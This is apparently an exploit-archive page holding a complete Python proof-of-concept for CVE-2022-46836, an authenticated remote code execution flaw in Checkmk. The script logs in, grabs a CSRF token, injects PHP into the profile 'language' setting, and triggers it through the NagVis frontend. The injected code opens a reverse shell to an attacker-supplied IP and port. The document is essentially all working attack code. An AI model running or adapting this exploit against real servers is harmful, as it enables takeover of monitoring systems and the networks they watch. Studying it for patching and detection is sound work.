4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
# Exploit Title: CheckMK - Authenticated Remote Code Execution
# Date: 28-03-2023
# Exploit Author: Jacob Ebben
# Version: Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29
# Tested on: CheckMK 2.1.0p10 - Official CheckMK Docker Image
# CVE: CVE-2022-46836

#!/usr/bin/env python3

import argparse
import requests
import urllib3
from bs4 import BeautifulSoup
import re
from termcolor import colored

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def print_message(message, type):
    if type == 'SUCCESS':
        print('[' + colored('SUCCESS', 'green') +  '] ' + message)
    elif type == 'INFO':
        print('[' + colored('INFO', 'blue') +  '] ' + message)
    elif type == 'WARNING':
        print('[' + colored('WARNING', 'yellow') +  '] ' + message)
    elif type == 'ALERT':
        print('[' + colored('ALERT', 'yellow') +  '] ' + message)
    elif type == 'ERROR':
        print('[' + colored('ERROR', 'red') +  '] ' + message)


class POC:
    def __init__(self, target, ip, port, username, password, proxy):
        self.base_url = self._get_normalized_url(target)
        self.username = username
        self.password = password
        self.ip = ip
        self.port = port
        self.proxies = self._get_proxies(self.base_url, proxy) if proxy else {}

        self.session = requests.Session()

    def confirm(self):
        print_message("This script is designed to remove malicious artifacts, but remnants could remain!", "WARNING")
        confirmation_message = "Are you sure you wish to run this script? (Y/n) "
        confirmation_input = input('[' + colored('ALERT', 'yellow') +  '] ' + confirmation_message)
        return confirmation_input == "Y"


    def exploit(self):
        print_message("Starting login process ...", "INFO")
        self._login()
        print_message("Login appears successful!", "SUCCESS")
        print_message("Attempting to write the payload to auth.php ...", "INFO")
        settings = self._get_settings()
        print_message("Writing payload ...", "INFO")
        payload = f"\\')); $sock=fsockopen(\"{self.ip}\",{self.port});$proc=proc_open(\"sh\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); /*"
        self._set_settings(settings, payload)
        self._trigger_payload()
        print_message("A reverse shell should have gone out!", "SUCCESS")
        print_message("Resetting profile settings to non-malicious", "INFO")
        settings = self._get_settings()
        self._set_settings(settings, "en")
        

    def _set_settings(self, settings, payload):
        profile_url = self.base_url + "check_mk/user_profile.py"
        csrf_token = self._get_csrf(profile_url)
        set_result = self.session.post(
            profile_url,
            files=(
                ('csrf_token', (None, csrf_token)),
                ('language', (None, payload)),
                ('ua_ui_sidebar_position', (None, settings["ua_ui_sidebar_position"])),
                ('ua_start_url_use', (None, settings["ua_start_url_use"])),
                ('ua_icons_per_item', (None, settings["ua_icons_per_item"])),
                ('ua_show_mode_use', (None, settings["ua_show_mode_use"])),
                ('ua_nav_hide_icons_title', (None, settings["ua_nav_hide_icons_title"])),
                ('ua_ui_theme_use', (None, settings["ua_ui_theme_use"])),
                ('filled_in', (None, settings["filled_in"])),
                ('_transid', (None, settings["_transid"])),
                ('_save', (None, "SET")),
            ),
            proxies=self.proxies,
            allow_redirects=False,
            verify=False
        )

    def _get_settings(self):
        profile_url = self.base_url + "check_mk/user_profile.py"
        profile_source = self.session.get(profile_url, proxies=self.proxies, verify=False).text
        bs_page_source = BeautifulSoup(profile_source, 'html.parser')
        settings = {
            "ua_ui_sidebar_position": bs_page_source.find(id="ua_ui_sidebar_position").find(selected="")["value"],
            "ua_nav_hide_icons_title": bs_page_source.find(id="ua_nav_hide_icons_title").find(selected="")["value"],
            "ua_start_url_use": bs_page_source.find(id="ua_start_url_use").find(selected="")["value"],
            "ua_icons_per_item": bs_page_source.find(id="ua_icons_per_item").find(selected="")["value"],
            "ua_show_mode_use": bs_page_source.find(id="ua_show_mode_use").find(selected="")["value"],
            "ua_ui_theme_use": bs_page_source.find(id="ua_ui_theme_use").find(selected="")["value"],
            "filled_in": bs_page_source.find("input", {"name":"filled_in"})["value"],
            "_transid": bs_page_source.find("input", {"name":"_transid"})["value"],
        }
        return settings


    def _get_csrf(self, url):
        csrf_request = self.session.get(url, proxies=self.proxies, verify=False)
        csrf_regex = r'var global_csrf_token = "([^"]*)";'
        csrf_regex_result = re.search(csrf_regex, csrf_request.text)
        if csrf_regex_result is not None:
            return csrf_regex_result.group(1)
        else:
            print_message(f"Could not retrieve a CSRF token from: {url}", "ERROR")
            exit()

    def _trigger_payload(self):
        trigger_url = self.base_url + "nagvis/frontend/nagvis-js/index.php"
        login_result = self.session.get(trigger_url, proxies=self.proxies, verify=False)

    def _login(self):
        print_message(f"Logging in with \"{self.username}:{self.password}\"!", "SUCCESS")
        login_url = self.base_url + "check_mk/login.py"
        login_result = self.session.post(
            login_url,
            files=(
                ('_username', (None, self.username)),
                ('_password', (None, self.password)),
                ('_login', (None, 'Login')),
            ),
            proxies=self.proxies,
            allow_redirects=False,
            verify=False
        )
        if login_result.status_code == 200:
            print_message(f"Login was not successful!", "ERROR")
            print_message(f"Are you sure the provided credentials are correct?", "INFO")
            exit()

    def _get_normalized_url(self, url):
        if url[-1] != '/':
            url += '/'
        if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
            url = "http://" + url
        return url

    def _get_proxies(self, target_url, proxy_url):
        return {self._get_url_protocol(target_url): self._get_normalized_url(proxy_url)}

    def _get_url_protocol(self, url):
        if url[0:8].lower() == 'https://':
            return 'https'
        return 'http'

def main():
    parser = argparse.ArgumentParser(description="CheckMK - Authenticated Remote Code Execution")

    parser.add_argument('-t', '--target', required=True, type=str, help="url of the vulnerable site (Example: \"http://127.0.0.1/cmk/\" or \"https://checkmk.example.xyz/cmk/\")"),
    parser.add_argument('-u', '--username', required=True, type=str, help='valid username'),
    parser.add_argument('-p', '--password', required=True, type=str, help='valid password'),
    parser.add_argument('-I', '--atk-ip', required=True, type=str, help='attacker ip for reverse shell'),
    parser.add_argument('-P', '--atk-port', required=True, type=str, help='attacker port for reverse shell'),
    parser.add_argument('-x','--proxy', default=None, type=str, help='http proxy address (Example: http://127.0.0.1:8080/)')
    parser.add_argument("--force", action='store_true', help="skip confirmation request")

    args = parser.parse_args()

    exploit = POC(args.target, args.atk_ip, args.atk_port, args.username, args.password, args.proxy)
    if args.force or exploit.confirm():
        exploit.exploit()
    else:
        print_message("Exiting without exploitation ...", "INFO")


if __name__ == "__main__":
    main()